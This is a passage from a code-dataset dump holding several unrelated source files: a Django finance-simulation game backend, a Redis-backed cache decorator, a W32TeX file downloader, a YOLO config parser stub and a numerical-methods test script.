random.uniform(0,1)\n if(seleccion >= .7):\n macro_id = TipoEvento.objects.get(TipoEvento = 'Macro').pk\n query_macro = eventosDisp.filter(TipoEvento=macro_id, User=user)\n getSeleccion(query_macro, 'Macro', eventos, turno)\n else:\n eventos.append({})\n return eventos\n\n###################################################################\n\n###################################################################\n\"\"\"\nPREGUNTA\n\"\"\"\n\ndef modifyPregunta(user, pregunta):\n preguntaUser = Preguntas_User.objects.get(User=user.id, Pregunta=pregunta.id)\n Preguntas_User.objects.filter(User=user.id, Pregunta=pregunta.id).update(Frecuencia=preguntaUser.Frecuencia - 1)\n\ndef preguntaAfecta(user, pregunta):\n afectaList = []\n afecta_pregunta = Preguntas_Afecta.objects.filter(Preguntas=pregunta)\n tipoInversion = TipoPregunta.objects.filter(id=pregunta.TipoPreguntas.id).first()\n for afecta in afecta_pregunta:\n duracion = Periodo.objects.filter(TipoPeriodo=afecta.Periodo).first()\n if tipoInversion.SaldoInversion != 'GananciaCapital':\n tipoAfecta = afectaInversion(afecta, user)\n if tipoAfecta:\n afecta_usuario = Afecta_user(User=user, Descripcion=pregunta.Descripcion, Afecta=afecta.Afecta, TurnosEsperar=duracion.Turnos, TurnosRestante=duracion.Turnos, Cantidad=afecta.Cantidad, Duracion=afecta.Duracion)\n afecta_usuario.save()\n afectaList.append(afecta_usuario.id)\n else:\n if str(afecta.Afecta) == 'DineroEfectivo' and afecta.Periodo.Turnos != -1:\n rangoRendimiento = (tipoInversion.TasaRendimiento).split(\" \")\n limite_inferior = float(rangoRendimiento[0])\n limite_superior = float(rangoRendimiento[2])\n tasaRendimiento = random.uniform(limite_inferior,limite_superior)\n cantidad = (Decimal(afecta.Cantidad) * -1)\n inversionPregunta = InversionPregunta(User=user, Descripcion=pregunta.Descripcion, TipoInversion=tipoInversion, SaldoInicial=cantidad, InicialMasAportacion=cantidad, EventoExterno=0, TazaRendimiento=tasaRendimiento, Aportacion=0, SaldoActual=cantidad, SaldoInvercion= tipoInversion.SaldoInversion)\n inversionPregunta.save()\n tipoAfecta = afectaInversion(afecta, user)\n if tipoAfecta:\n afecta_usuario = Afecta_user(User=user, Descripcion=pregunta.Descripcion, Afecta=afecta.Afecta, TurnosEsperar=duracion.Turnos, TurnosRestante=duracion.Turnos, Cantidad=afecta.Cantidad, Duracion=afecta.Duracion)\n afecta_usuario.save()\n afectaList.append(afecta_usuario.id)\n return afectaList\n\ndef validarPregunta(user, pregunta):\n turno = Turnos.objects.filter(User=user).first()\n afecta_pregunta = Preguntas_Afecta.objects.filter(Preguntas=pregunta)\n for afecta in afecta_pregunta:\n duracion = Periodo.objects.filter(TipoPeriodo=afecta.Periodo).first()\n if duracion.Turnos == -1:\n if str(afecta.Afecta) == 'DineroEfectivo':\n if turno.DineroEfectivo < Decimal(afecta.Cantidad):\n return False\n if str(afecta.Afecta) == 'Felicidad':\n if turno.Felicidad < afecta.Felicidad:\n return False\n if str(afecta.Afecta) == 'Egresos':\n if turno.Egresos < afecta.Egresos:\n return False\n if str(afecta.Afecta) == 'Ingresos':\n if turno.Ingresos < afecta.Ingresos:\n return False\n return True\n \ndef getAfectaPregunta(response):\n for i in response:\n if i != {}:\n i['Afecta'] = []\n pregunta = Preguntas.objects.filter(id = i[\"Pregunta_id\"]).first()\n afectas = Preguntas_Afecta.objects.filter(Preguntas = pregunta)\n for afecta in afectas:\n if afecta.Periodo.Turnos != -1:\n periodo = str(afecta.Periodo)\n if afecta.Periodo.Turnos < 0:\n periodo = \"Exclusivo\"\n duracion = afecta.Duracion\n if afecta.Duracion > 1000:\n duracion = \"Infinito\"\n i['Afecta'].append({\"Afecta\": afecta.Afecta.TipoAfect, \"Cantidad\": afecta.Cantidad, \"Periodo\":periodo, \"Duracion\":duracion})\n\ndef afectaInversion(afecta, user):\n listaInversionAfecta = ['Telecomunicaciones', 'Tecnologia', 'Construccion', 'Bienes_Raices']\n if str(afecta.Afecta) in listaInversionAfecta:\n inversionesAcciones = Inversion.objects.filter(TipoEmpresa=afecta.Afecta, User=user)\n for inversion in inversionesAcciones:\n inversion.EventoExterno = afecta.Cantidad\n inversion.save()\n #Checar como funciona el Evento externo en inversinPregunta\n return False\n else:\n if str(afecta.Afecta) == \"GananciaCapital\":\n inversionesPregunta = InversionPregunta.objects.filter(User=user)\n if int(len(inversionesPregunta)) > 0:\n seleccion = random.randint(int(1),int(len(inversionesPregunta))) -1\n else: seleccion = 1\n cont = 1\n for inversion in inversionesPregunta:\n if cont == seleccion:\n inversion.EventoExterno = afecta.Cantidad\n inversion.save()\n cont = cont + 1\n\n return True\n\ndef getSeleccionPregunta(queryset, tipoEvento, preguntas, turno):\n df = pd.DataFrame(list(queryset.values()))\n df['FrecuenciaAcumulada'] = df['Frecuencia'].cumsum()\n df = df.sample(frac=1).reset_index(drop=True)\n for x in range(0,4,1):\n limite_inferior = df['FrecuenciaAcumulada'].min()\n limite_superior = df['FrecuenciaAcumulada'].max()\n borrar = -10\n seleccion = random.uniform(limite_inferior,limite_superior)\n for index, row in df.iterrows():\n if ((row['FrecuenciaAcumulada'] >= seleccion) and (verificarRequisitos(row['Pregunta_id'], turno, 'Pregunta'))):\n desc = Preguntas.objects.get(id=row['Pregunta_id'])\n desc = str(desc.Descripcion)\n descTipo = TipoPregunta.objects.get(id=row['TipoPreguntas_id'])\n descTipo = str(descTipo.TipoPregunta).split('_')[0]\n temp = row[['Pregunta_id']].to_dict()\n temp['Descripcion'] = desc\n temp['TipoPregunta'] = descTipo\n preguntas.append(temp)\n borrar = index\n df.drop(borrar, inplace = True, errors = 'ignore' )\n borrar = -10\n break\n else:\n pass\n\n \n\ndef seleccionPregunta(user):\n turno = Turnos.objects.filter(User=user).first()\n preguntas = []\n PreguntasDisp = Preguntas_User.objects.values_list('Pregunta','Frecuencia','TipoPreguntas').exclude(Frecuencia=0)\n inversion_id = TipoPregunta.objects.values_list('id',flat=True).filter(TipoPregunta__startswith = 'Inversion')\n diversion_id = TipoPregunta.objects.get(TipoPregunta = 'Diversion').pk\n bienes_id = TipoPregunta.objects.get(TipoPregunta = 'Bienes Personales').pk\n laboral_id = TipoPregunta.objects.get(TipoPregunta= 'Laboral').pk\n query_inversion = PreguntasDisp.filter(TipoPreguntas__in=inversion_id, User=user)\n query_diversion = PreguntasDisp.filter(TipoPreguntas=diversion_id,User=user)\n query_bienes = PreguntasDisp.filter(TipoPreguntas=bienes_id,User=user)\n query_laboral = PreguntasDisp.filter(TipoPreguntas=laboral_id,User=user)\n getSeleccionPregunta(query_inversion, 'Inversion', preguntas, turno)\n getSeleccionPregunta(query_diversion, 'Diversion', preguntas, turno)\n getSeleccionPregunta(query_bienes, 'Bienes Personales', preguntas, turno)\n getSeleccionPregunta(query_laboral, 'Laboral', preguntas, turno)\n return preguntas \n\n###################################################################\n\n###################################################################\n\"\"\"\nINICIO DE TURNO\n\"\"\"\ndef afectaTurnoinstantaneo(afectaActions, turno):\n for afecta in afectaActions:\n afecta.TurnosRestante = afecta.TurnosRestante - 1\n afecta.save()\n if afecta.TurnosRestante <= 0:\n afecta.Duracion = afecta.Duracion - 1\n afecta.save()\n if afecta.TurnosEsperar <= 0:\n afecta.delete()\n else:\n if afecta.Cantidad[0] == '%':\n cantidadAfecta = afecta.Cantidad[1:]\n if cantidadAfecta[0] == '-':\n cantidadAfecta = cantidadAfecta[1:]\n modifyTurno(turno, afecta.Afecta, cantidadAfecta, True, False)\n else:\n modifyTurno(turno, afecta.Afecta, cantidadAfecta, True, True)\n else:\n modifyTurno(turno, afecta.Afecta, afecta.Cantidad, False, True)\n afecta.TurnosRestante = afecta.TurnosEsperar\n afecta.save()\n turno.save()\n if afecta.Duracion <= 0: \n afecta.delete()\n\n#Se aplican todos los afectas relacionados con el usuario\ndef afectaTurnos(user, turno):\n \n afectaActions = Afecta_user.objects.filter(User=user)\n for afecta in afectaActions:\n afecta.TurnosRestante = afecta.TurnosRestante - 1\n afecta.save()\n if afecta.TurnosRestante <= 0:\n afecta.Duracion = afecta.Duracion - 1\n afecta.save()\n if afecta.TurnosEsperar <= 0:\n afecta.delete()\n else:\n if afecta.Cantidad[0] == '%':\n cantidadAfecta = afecta.Cantidad[1:]\n if cantidadAfecta[0] == '-':\n cantidadAfecta = cantidadAfecta[1:]\n modifyTurno(turno, afecta.Afecta, cantidadAfecta, True, False)\n else:\n modifyTurno(turno, afecta.Afecta, cantidadAfecta, True, True)\n else:\n modifyTurno(turno, afecta.Afecta, afecta.Cantidad, False, True)\n afecta.TurnosRestante = afecta.TurnosEsperar\n afecta.save()\n turno.save()\n if afecta.Duracion <= 0: \n afecta.delete()\n \n#Es la forma en la que se modifica el turno actual del usuario (Se puede cambiar) \ndef modifyTurno(turno, afecta, cantidad, porcentaje, suma):\n if afecta == 'Felicidad':\n if porcentaje:\n if suma:\n turno.Felicidad = turno.Felicidad + (turno.Felicidad * Decimal(float(cantidad)/100))\n turno.save()\n return True\n turno.Felicidad = turno.Felicidad - (turno.Felicidad * Decimal(float(cantidad)/100))\n turno.save()\n return True\n turno.Felicidad = turno.Felicidad + Decimal(cantidad)\n turno.save()\n return True\n\n elif afecta == 'DineroEfectivo':\n if porcentaje:\n if suma:\n turno.DineroEfectivo = turno.DineroEfectivo + (turno.DineroEfectivo * Decimal(float(cantidad)/100))\n return True\n turno.DineroEfectivo = turno.DineroEfectivo - (turno.DineroEfectivo * Decimal(float(cantidad)/100))\n return True\n turno.DineroEfectivo = turno.DineroEfectivo + Decimal(cantidad)\n return True\n elif afecta == 'Sueldo':\n sueldoActual = Afecta_user.objects.filter(User=turno.User, Afecta='SueldoReal').first()\n if porcentaje:\n if suma:\n sueldoActual.Cantidad = str(Decimal(sueldoActual.Cantidad) + (Decimal(sueldoActual.Cantidad) * Decimal(float(cantidad)/100)))\n sueldoActual.save()\n return True\n sueldoActual.Cantidad = str(Decimal(sueldoActual.Cantidad) - (Decimal(sueldoActual.Cantidad) * Decimal(float(cantidad)/100)))\n sueldoActual.save()\n return True\n sueldoActual.Cantidad = str(Decimal(sueldoActual.Cantidad) + Decimal(cantidad))\n sueldoActual.save()\n return True\n elif afecta == 'SueldoReal':\n if porcentaje:\n if suma:\n turno.DineroEfectivo = turno.DineroEfectivo + (turno.DineroEfectivo * Decimal(float(cantidad)/100))\n return True\n turno.DineroEfectivo = turno.DineroEfectivo - (turno.DineroEfectivo * Decimal(float(cantidad)/100))\n return True\n turno.DineroEfectivo = turno.DineroEfectivo + Decimal(cantidad)\n ######################\n elif afecta == 'EgresoPersonal':\n if porcentaje:\n if suma:\n turno.DineroEfectivo = turno.DineroEfectivo + (turno.DineroEfectivo * Decimal(float(cantidad)/100))\n return True\n turno.DineroEfectivo = turno.DineroEfectivo - (turno.DineroEfectivo * Decimal(float(cantidad)/100))\n return True\n turno.DineroEfectivo = turno.DineroEfectivo + Decimal(cantidad)\n #####################\n elif 'Inversion' in str(afecta):\n turno.DineroEfectivo = turno.DineroEfectivo + Decimal(cantidad)\n elif afecta == 'Ingresos':\n turno.DineroEfectivo = turno.DineroEfectivo + Decimal(cantidad)\n elif afecta == 'Egresos':\n turno.DineroEfectivo = turno.DineroEfectivo - Decimal(cantidad)\n\ndef turnoIngresosEgresos(user, turno):\n \n prestamos = Prestamo.objects.filter(User = user)\n inversiones = Inversion.objects.filter(User = user)\n ingresos = Afecta_user.objects.filter(Afecta = 'Ingresos', User = user)\n egresos = Afecta_user.objects.filter(Afecta = 'Egresos', User = user)\n inversionesAfecta = Afecta_user.objects.filter(Afecta__startswith = 'Inversion', User = user)\n inversionPregunta = InversionPregunta.objects.filter(User = user)\n sueldoActual = Afecta_user.objects.filter(User=user, Afecta='SueldoReal').first()\n \n turnoEgresos = Decimal(8000)\n turnoIngresos = Decimal(sueldoActual.Cantidad)\n\n for prestamo in prestamos:\n turnoEgresos = turnoEgresos + Decimal(prestamo.Mensualidad)\n\n \n #No es un ingreso por que no lo recibes mensualmente\n \"\"\"\n for inversion in inversiones:\n turnoIngresos = turnoIngresos + inversion.SaldoActual\n \"\"\"\n\n for ingreso in ingresos:\n portafolioCantidad = afectaMensual(ingreso)\n turnoIngresos = turnoIngresos + portafolioCantidad\n\n for egreso in egresos:\n portafolioCantidad = afectaMensual(egreso)\n turnoEgresos = turnoEgresos + Decimal(portafolioCantidad)\n\n for inversion in inversionesAfecta:\n portafolioCantidad = afectaMensual(inversion)\n turnoIngresos = turnoIngresos + portafolioCantidad\n\n #No es un ingreso por que no lo recibes mensualmente\n \"\"\"\n for inversion in inversionPregunta:\n turnoIngresos = turnoIngresos + inversion.SaldoActual\n \"\"\"\n \n turno.Ingresos = turnoIngresos\n turno.Egresos = turnoEgresos\n turno.save()\n\ndef afectaMensual(afecta):\n if afecta.TurnosEsperar > 4:\n numDividir = afecta.TurnosEsperar / 4\n afectaCantidad = Decimal(afecta.Cantidad) / Decimal(numDividir)\n elif afecta.TurnosEsperar == 2:\n afectaCantidad = Decimal(afecta.Cantidad) * 2\n elif afecta.TurnosEsperar == 1:\n afectaCantidad = Decimal(afecta.Cantidad) * 4\n else :\n afectaCantidad = Decimal(afecta.Cantidad)\n return Decimal(afectaCantidad)\n\n\ndef prestamosTurnos(user, turno, prestamos):\n\n for prestamo in prestamos:\n if prestamo.Frecuencia <= 0:\n turno.DineroEfectivo = turno.DineroEfectivo - prestamo.Mensualidad\n tipoPrestamo = prestamo.idPrestamo\n tipoPrestamo = TipoPrestamo.objects.filter(idPrestamo = str(tipoPrestamo)).first()\n\n interes = re.sub('%', '',str(tipoPrestamo.TazaInteres) )\n interes = float(interes)/100\n interesMensual = prestamo.SaldoAbsoluto * Decimal(interes/12)\n\n prestamo.SaldoAbsoluto = prestamo.SaldoAbsoluto - (prestamo.Mensualidad - interesMensual)\n\n if prestamo.SaldoAbsoluto < prestamo.Mensualidad:\n prestamo.Mensualidad = prestamo.SaldoAbsoluto\n\n interes = re.sub('%', '',str(tipoPrestamo.TazaInteres) )\n interes = float(interes)/100\n interesMensual = prestamo.SaldoAbsoluto * Decimal(interes/12)\n\n prestamo.Frecuencia = 3\n prestamo.Interes = interesMensual\n prestamo.save()\n\n if prestamo.SaldoAbsoluto <= 0:\n prestamo.delete()\n turno.save()\n else:\n prestamo.Frecuencia = prestamo.Frecuencia - 1\n prestamo.save()\n\n \n\ndef inversionesTurnos(user, turno, inversiones):\n\n for inversion in inversiones:\n compania = TipoInversiones.objects.filter(id=inversion.TipoInversion.id).first()\n\n rangoRendimiento = (compania.RangoRendimiento).split(\" \")\n limite_inferior = float(rangoRendimiento[0])\n limite_superior = float(rangoRendimiento[2])\n tasaRendimiento = random.uniform(limite_inferior,limite_superior)\n\n if float(inversion.EventoExterno) != 0:\n inversion.SaldoActual = inversion.SaldoActual + (inversion.SaldoActual * Decimal(inversion.EventoExterno))\n inversion.EventoExterno == 0\n inversion.save()\n\n inversion.TasaRendimiento = tasaRendimiento\n inversion.SaldoActual = inversion.SaldoActual + (inversion.SaldoActual * Decimal(inversion.TasaRendimiento))\n inversion.save()\n\ndef inversionesPreguntasTurnos(user, turno, inversionesPregunta):\n for inversion in inversionesPregunta:\n tipoInversion = TipoPregunta.objects.filter(id=inversion.TipoInversion.id).first()\n\n rangoRendimiento = (tipoInversion.TasaRendimiento).split(\" \")\n limite_inferior = float(rangoRendimiento[0])\n limite_superior = float(rangoRendimiento[2])\n tasaRendimiento = random.uniform(limite_inferior,limite_superior)\n\n if float(inversion.EventoExterno) != 0:\n inversion.SaldoActual = inversion.SaldoActual + (inversion.SaldoActual * Decimal(inversion.EventoExterno))\n inversion.EventoExterno == 0\n inversion.save()\n\n ###### ver el video del profe para entender bien como funciona ######\n inversion.TazaRendimiento = tasaRendimiento\n inversion.SaldoActual = inversion.SaldoActual + (inversion.SaldoActual * Decimal(inversion.TazaRendimiento))\n inversion.save()\n\n###################################################################\n\n###################################################################\n\ndef riesgoInversion(rangoRendimiento):\n rango = rangoRendimiento.split(\" \")\n limBajo = float(rango[0])\n limAlto = float(rango[2])\n\n if limBajo < 0 and limAlto <= 0:\n return \"Muy Bajo\"\n elif limBajo < 0 and limAlto + limBajo <= 0 and limAlto - limBajo > 1:\n return \"Muy Bajo\"\n elif limBajo < 0 and limAlto + limBajo <= 0 and limAlto - limBajo > .5:\n return \"Bajo\"\n elif limBajo < 0:\n return \"Medio\"\n elif limAlto - limBajo < .2:\n return \"Alto\"\n return \"Muy Alto\"\n\n\n###################################################################\n\n###################################################################\n\ndef borrarInfoUser(user):\n prestamos = Prestamo.objects.filter(User=user)\n afecta = Afecta_user.objects.filter(User=user)\n turno = Turnos.objects.filter(User=user)\n inversiones = Inversion.objects.filter(User = user)\n inversionPregunta = InversionPregunta.objects.filter(User = user)\n preguntas = Preguntas_User.objects.filter(User = user)\n eventos = Evento_User.objects.filter(User = user)\n\n\n eventos.delete()\n preguntas.delete()\n inversionPregunta.delete()\n inversiones.delete()\n turno.delete()\n afecta.delete()\n prestamos.delete()\n\ndef reiniciarUser(user):\n\n #Crear turno actual del usuario\n newTurno = Turnos(NumeroTurnos=0, Felicidad=50, DineroEfectivo=20000, Ingresos=1000, Egresos=0, Sueldo=15000, User=user)\n newTurno.save()\n\n #Crear relacion con todos los eventos\n eventos = Evento.objects.all()\n for event in eventos:\n user_event = Evento_User(User=user, Evento=event, Frecuencia=event.Frecuencia, TipoEvento=event.TipoEvento)\n user_event.save()\n\n #Crear relacion con todas las preguntas\n preguntas = Preguntas.objects.all()\n for pregu in preguntas:\n user_pregu = Preguntas_User(User=user, Pregunta=pregu, Frecuencia=pregu.Frecuencia, TipoPreguntas=pregu.TipoPreguntas)\n user_pregu.save()\n \n #Crear afecta de sueldo\n user_afecta = Afecta_user(Afecta=\"SueldoReal\", Descripcion=\"Eres empleado\", User=user, TurnosEsperar=4, TurnosRestante=4, Cantidad=newTurno.Sueldo, Duracion=99999999)\n user_afecta.save()","sub_path":"back/MoneyLifeBack/monyLifeApp/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":29449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"449231651","text":"import functools\nimport traceback\nfrom collections import defaultdict\nfrom functools import wraps\n\nimport hashlib\nimport inspect\nfrom django.conf import settings\nfrom django.core.cache import caches, DEFAULT_CACHE_ALIAS\nfrom django.core.cache.backends.dummy import DummyCache\nfrom django.dispatch import Signal, receiver\n\nfrom django.utils.encoding import force_text, force_bytes\nfrom django_redis import get_redis_connection\n\nMARKER = object()\n\n# 默认缓存1天\nDEFAULT_TIME_OUT = 86400\n\nCACHE_MODEL_FIELD_MAP = defaultdict(lambda: list())\nfrom django.db.models import signals\n\n\n# 保存&删除 清理缓存\n@receiver(signals.post_save)\n@receiver(signals.post_delete)\ndef cache_evict(sender, instance, **kwargs):\n evict_model_cache_signal.send(sender, instance=instance)\n\n\ndef cache_method(\n timeout=DEFAULT_TIME_OUT,\n cache_alias=DEFAULT_CACHE_ALIAS,\n cache_for_function_user=True,\n except_key_gen_args=None,\n evict_register=None\n):\n \"\"\" 缓存方法装饰器\n 注册的模型对象与缓存键的关系,存储在redis的set中\n\n :arg int timeout: 缓存 过期时间,秒\n :arg string cache_alias: 缓存别名,默认 'default'\n :arg bool cache_for_function_user : 是否为作为用户缓存,如果是用户缓存,调用方法者(实例对象)需要具有user属性\n :arg tuple except_key_gen_args: 不参与缓存key生成的参数\n :arg tuple evict_register: 注册模型的属性与参数的关系。如果属性与参数名称一直,可以用元组代替字典\n (Model, {model_field_name : arg_name}\n \"\"\"\n def decorator(func):\n def zip_args(*args, **kwargs):\n arg_names = inspect.getfullargspec(func)\n arg_dict = dict(zip(arg_names.args, args))\n return arg_dict\n\n def _default_make_cache_key(*args, **kwargs):\n cache_key = \"\"\n\n arg_dict = zip_args(*args, **kwargs)\n\n if except_key_gen_args:\n for i in except_key_gen_args:\n del arg_dict[i]\n\n if 'self' in arg_dict:\n del arg_dict['self']\n\n if 'cls' in arg_dict:\n del arg_dict['cls']\n\n if cache_for_function_user:\n if len(args) > 0 and hasattr(args[0], 'user'):\n user = getattr(args[0], 'user')\n if user:\n cache_key += \"_user:\" + str(user.id) + \"_\"\n\n cache_key += \"&\".join(\n [force_text(x) for x in list(arg_dict.values())[1:]]\n + [force_text(\"{}={}\".format(k, v)) for k, v in kwargs.items()]\n )\n else:\n cache_key += \"&\".join(\n [force_text(x) for x in arg_dict.values()]\n + [force_text(\"{}={}\".format(k, v)) for k, v in kwargs.items()]\n )\n\n cache_key = ((func.func if isinstance(func,\n functools.partial) else func).__qualname__) + '.' + cache_key\n\n # cache_key = hashlib.md5(force_bytes(cache_key)).hexdigest()\n\n print(cache_key)\n return cache_key\n\n _make_cache_key = _default_make_cache_key\n\n def register(cache_key, *args, **kwargs):\n if evict_register:\n arg_dict = zip_args(*args, **kwargs)\n for r in evict_register:\n models = r['model'] if isinstance(r['model'], (tuple, list)) else (r['model'],)\n\n fields = None\n if hasattr(r, 'field') and r['field']:\n fields = {}\n if isinstance(r['field'], dict):\n for k, v in r['field'].items():\n fields[k] = arg_dict[v]\n else:\n for v in r['field']:\n fields[v] = arg_dict[v]\n\n keys = tuple([k for k in\n (r['field'].keys() if isinstance(r['field'], dict) else r['field'])])\n\n for model in models:\n if keys not in CACHE_MODEL_FIELD_MAP[model]:\n CACHE_MODEL_FIELD_MAP[model].append(keys)\n\n cache_evict_register(model, fields, cache_key, cache_alias)\n _make_cache_key = _default_make_cache_key\n\n @wraps(func)\n def inner(*args, **kwargs):\n cache = caches[cache_alias]\n _refresh = bool(kwargs.pop(\"_refresh\", False))\n cache_key = _make_cache_key(*args, **kwargs)\n register(cache_key, *args, **kwargs)\n\n if _refresh:\n result = MARKER\n else:\n result = cache.get(cache_key, MARKER)\n\n if result is MARKER:\n result = func(*args, **kwargs)\n cache.set(cache_key, result, timeout)\n return result\n\n def invalidate(*args, **kwargs):\n cache = caches[cache_alias]\n kwargs.pop(\"_refresh\", None)\n cache_key = _make_cache_key(*args, **kwargs)\n cache.delete(cache_key)\n\n inner.invalidate = invalidate\n return inner\n\n return decorator\n\n\ndef cache_evict_register(model: object, fields: dict, cache_key: str, cache_alias=DEFAULT_CACHE_ALIAS):\n \"\"\"\n 注册model-instance对应的所有的 缓存键,缓存键 以set的方式存储在redis中\n :param model: 模型类\n :param fields: 模型实例的属性值\n :param cache_key: 缓存键\n :param cache_alias:\n :return:\n \"\"\"\n if not _is_dummy_cache(cache_alias):\n register_key = _generate_cache_evict_key(model, fields, cache_alias)\n get_redis_connection().sadd(register_key, cache_key)\n\n\ndef _is_dummy_cache(alias):\n return isinstance(caches[alias], DummyCache)\n\n\ndef _generate_cache_evict_key(model, fields: dict, cache_alias=DEFAULT_CACHE_ALIAS):\n \"\"\"\n 生成缓存set键\n :param model: 模型类\n :param fields: 模型实例的属性值\n :param cache_alias:\n :return:\n \"\"\"\n prefix = None\n try:\n prefix = settings.CACHES[cache_alias]['REGISTER_KEY_PREFIX']\n except KeyError:\n traceback.print_exc()\n else:\n pass\n register_key = (prefix + ':' if prefix else '') + force_text(model) + \"@\" + (\"&\".join(\n [force_text(k) + \":\" + force_text(v) for k, v in fields.items()]) if fields else \"\")\n\n return register_key\n\n\n# 模型单个实例变动清除信号\nevict_model_cache_signal = Signal()\n# 模型批量变动 清除信号\nevict_model_bulk_caches_signal = Signal()\n\n\n@receiver(evict_model_cache_signal)\ndef evict_model_cache(sender, instance, **kwargs):\n \"\"\"\n 清除单个实例变更的缓存\n :param sender: 模型类\n :param instance: 模型类实例\n :param kwargs:\n :return:\n \"\"\"\n print('----cache evict------')\n # print(instance)\n # print(sender)\n # print(kwargs)\n # print(CACHE_MODEL_FIELD_MAP)\n\n if sender in CACHE_MODEL_FIELD_MAP:\n cache_field_groups = CACHE_MODEL_FIELD_MAP[sender]\n fields = {}\n for fg in cache_field_groups:\n for f in fg:\n if hasattr(instance, f):\n fields[f] = getattr(instance, f)\n\n for cache_alias in settings.CACHES.keys():\n if not _is_dummy_cache(cache_alias):\n register_key = _generate_cache_evict_key(sender, fields, cache_alias)\n keys = get_redis_connection().smembers(register_key)\n for cache_key in keys:\n try:\n caches[cache_alias].delete(force_text(cache_key))\n except:\n traceback.print_exc()\n get_redis_connection().delete(register_key)\n\n\n@receiver(evict_model_bulk_caches_signal)\ndef evict_model_bulk_caches(sender, **kwargs):\n \"\"\"\n TODO 批量清除更好的方法\n 批量清除缓存 bulk_update & bulk_delete\n :param sender:\n :param kwargs:\n :return:\n \"\"\"\n if sender in CACHE_MODEL_FIELD_MAP:\n for cache_alias in settings.CACHES.keys():\n if not _is_dummy_cache(cache_alias):\n print(sender)\n print(cache_alias)\n register_key_regex = _generate_cache_evict_key(sender, None, cache_alias) + \"*\"\n print(register_key_regex)\n\n register_keys = get_redis_connection().keys(register_key_regex)\n for register_key in register_keys:\n set_key = force_text(register_key)\n keys = get_redis_connection().smembers(set_key)\n print(keys)\n for cache_key in keys:\n try:\n caches[cache_alias].delete(force_text(cache_key))\n except:\n traceback.print_exc()\n get_redis_connection().delete(*register_keys)\n# evict_model_cache_signal.connect(evict_model_cache)\n","sub_path":"python/django/demo/lib/cache_method/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"26866853","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport urllib.request\nimport os\nimport argparse\n\ndef jsonToFileNames(path) :\n arr = []\n with open(path) as f:\n arr = json.load(f)\n return arr\n\ndef fileNamesToUris(baseuri, fileNames) :\n return [baseuri + fileName for fileName in fileNames]\n\ndef download(uri, dir) :\n fileName = uri.rsplit('/', 1)[1].split('?')[0]\n path = os.path.join(dir, fileName)\n urllib.request.urlretrieve(uri, path)\n\ndef createDir(dir) :\n if not os.path.exists(dir) :\n os.makedirs(dir)\n return dir\n\ndef main():\n #---------------------------------------------------------------------------\n # option parser\n #---------------------------------------------------------------------------\n parser = argparse.ArgumentParser(description = 'This script downloads w32tex files.')\n parser.add_argument('-b', '--baseuri', dest = 'baseuri', required = True, help='''target uri's base string.''')\n parser.add_argument('-j', '--json' , dest = 'json' , required = True, help='''target file name.''' )\n parser.add_argument('-t', '--target' , dest = 'target' , required = True, help='''files download to this.''' )\n args = parser.parse_args()\n \n fileNames = jsonToFileNames(args.json)\n uris = fileNamesToUris(args.baseuri, fileNames)\n targetDir = createDir(args.target)\n for uri in uris :\n print('download... ' + uri)\n download(uri, targetDir)\n\nif __name__ == \"__main__\":\n main()","sub_path":"W32TexDownloader.py","file_name":"W32TexDownloader.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"132126658","text":"# This file will contain the code that creates the YOLO network.\n\nfrom __future__ import division\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport numpy as np\n\n\ndef parse_config(config_file):\n\t\"\"\"\n\tTakes a configuration file\n\n\tReturns a list of blocks. Each blocks describes a block in the neural\n\tnetwork to be built. Block is represented as a dictionary in the list\n\n\t\"\"\"\n\tfile = open(config_file, 'r')\n\tlines = file.read().split('\\n') # store the lines in a list\n\tlines = [x for x in lines if len(x) > 0] # get read of the empty lines\n\tlines = [x for x in lines if x[0] != '#'] # get rid of comments\n\tlines = [x.rstrip().lstrip() for x in lines] # get rid of fringe whitespaces\n\n\tblock = {}\n\tblocks = []\n\n\tfor line in lines:\n\t\tif line[0] == \"[\": # This marks the start of a new block\n\t\t\tif len(block) != 0: # If block is not empty, implies it is storing values of previous block.\n\t\t\t\tblocks.append(block) # add it the blocks list\n\t\t\t\tblock = {} # re-init the block\n\t\t\tblock[\"type\"] = line[1:-1].rstrip()\n\t\telse:\n\t\t\tkey, value = line.split(\"=\")\n\t\t\tblock[key.rstrip()] = value.lstrip()\n\tblocks.append(block)\n\n\treturn blocks\n\ndef create_modules(blocks):\n\tnet_info = blocks[0] #Captures the information about the input and pre-processing\n\tmodule_list = nn.ModuleList()\n\tprev_filters = 3\n\toutput_filters = []\n\n\nparse_config(\"../config/cnn.config\")","sub_path":"src/darknet.py","file_name":"darknet.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"288884309","text":"\"\"\"\nName: Test_SpatialOperators.py\nAuthor: Sid Bishnu\nDetails: As the name implies, this script tests the various spatial operators of DGSEM computed in \n../../src/DGSEM_Rotating_Shallow_Water/SpatialOperators.py against their exact counterparts using smooth \ntwo-dimensional functions.\n\"\"\"\n\n\nimport os\nimport sys\nsys.path.append(os.path.realpath('../..') + '/src/DGSEM_Rotating_Shallow_Water/')\nfrom IPython.utils import io\nwith io.capture_output() as captured:\n import SpatialOperators as SO\n \n \ndef TestConvergenceStudyOfSpatialOperators():\n nXiMinimum = 2\n nXiMaximum = nXiMinimum + 2\n WriteState = True\n PlotAgainstNumberOfCellsInZonalDirection = True\n UseBestFitLine = True\n set_xticks_manually = False\n ReadFromSELFOutputData = True\n if ReadFromSELFOutputData:\n ReadDivergenceErrorNorm = False\n else:\n ReadDivergenceErrorNorm = True\n for nXi in range(nXiMinimum,nXiMaximum+1):\n if not(ReadFromSELFOutputData):\n SO.ConvergenceStudyOfSpatialOperators(nXi,WriteState)\n SO.PlotConvergenceDataOfSpatialOperators(nXi,PlotAgainstNumberOfCellsInZonalDirection,UseBestFitLine,\n set_xticks_manually,ReadFromSELFOutputData,ReadDivergenceErrorNorm)\n SO.PlotConvergenceDataOfAllSpatialOperators(nXiMinimum,PlotAgainstNumberOfCellsInZonalDirection,UseBestFitLine,\n 